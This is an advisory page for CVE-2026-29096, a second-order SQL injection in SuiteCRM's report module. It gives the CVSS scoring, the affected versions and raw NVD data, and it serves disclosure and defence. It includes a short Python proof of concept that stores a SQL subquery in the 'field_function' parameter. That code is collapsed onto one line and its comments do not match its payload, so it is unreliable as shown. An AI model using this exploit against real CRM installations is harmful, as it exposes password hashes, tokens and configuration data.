Security Vulnerability Report
中文
CVE-2026-29096 CVSS 8.1 HIGH

CVE-2026-29096

Published: 2026-03-19 23:16:41
Last Modified: 2026-03-24 14:58:53
Source: [email protected]

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, when creating or editing a report (AOR_Reports module), the `field_function` parameter from POST data is saved directly into the `aor_fields` table without any validation. Later, when the report is executed/viewed, this value is concatenated directly into a SQL SELECT query without sanitization, enabling second-order SQL injection. Any authenticated user with Reports access can extract arbitrary database contents (password hashes, API tokens, config values). On MySQL with FILE privilege, this could lead to RCE via SELECT INTO OUTFILE. Versions 7.15.1 and 8.9.3 patch the issue.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM < 7.15.1
SuiteCRM < 8.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-29096 (Second-order SQL Injection in SuiteCRM) # Attacker injects SQL payload into the 'field_function' parameter when creating a report. import requests target_url = "http://vulnerable-suitecrm.com/index.php" session = requests.Session() # 1. Login creds = {"user_name": "attacker", "user_password": "password"} session.post(target_url + "/?module=Users&action=Login", data=creds) # 2. Create Report with SQL Injection in field_function # The payload attempts to extract the database user payload = "(SELECT SUBSTRING(@@version, 1, 10))" report_data = { "module": "AOR_Reports", "action": "save", "name": "ExploitReport", "report_module": "Accounts", "field_function[]": payload # Vulnerable parameter } response = session.post(target_url, data=report_data) if response.status_code == 200: print("Report created successfully. SQL payload stored.") print("Trigger the report execution to execute the SQL.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29096", "sourceIdentifier": "[email protected]", "published": "2026-03-19T23:16:41.407", "lastModified": "2026-03-24T14:58:53.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, when creating or editing a report (AOR_Reports module), the `field_function` parameter from POST data is saved directly into the `aor_fields` table without any validation. Later, when the report is executed/viewed, this value is concatenated directly into a SQL SELECT query without sanitization, enabling second-order SQL injection. Any authenticated user with Reports access can extract arbitrary database contents (password hashes, API tokens, config values). On MySQL with FILE privilege, this could lead to RCE via SELECT INTO OUTFILE. Versions 7.15.1 and 8.9.3 patch the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto, lista para empresas. Antes de las versiones 7.15.1 y 8.9.3, al crear o editar un informe (módulo AOR_Reports), el parámetro 'field_function' de los datos POST se guarda directamente en la tabla 'aor_fields' sin ninguna validación. Más tarde, cuando el informe se ejecuta/visualiza, este valor se concatena directamente en una consulta SQL SELECT sin saneamiento, lo que permite una inyección SQL de segundo orden. Cualquier usuario autenticado con acceso a Informes puede extraer contenido arbitrario de la base de datos (hashes de contraseñas, tokens de API, valores de configuración). En MySQL con privilegio FILE, esto podría llevar a RCE a través de SELECT INTO OUTFILE. Las versiones 7.15.1 y 8.9.3 corrigen el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.15.1", "matchCriteriaId": "73648654-E7F6-47CF-8E01-19BBFF737C99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.3", "matchCriteriaId": "C7E15DD3-A934-40A2-8B43-ABCCBB53CBCF"}]}]}], "references": [{"url": "https://docs.suitecrm.com/admin/releases/7.15.x", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-vh42-gmqm-q55m", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.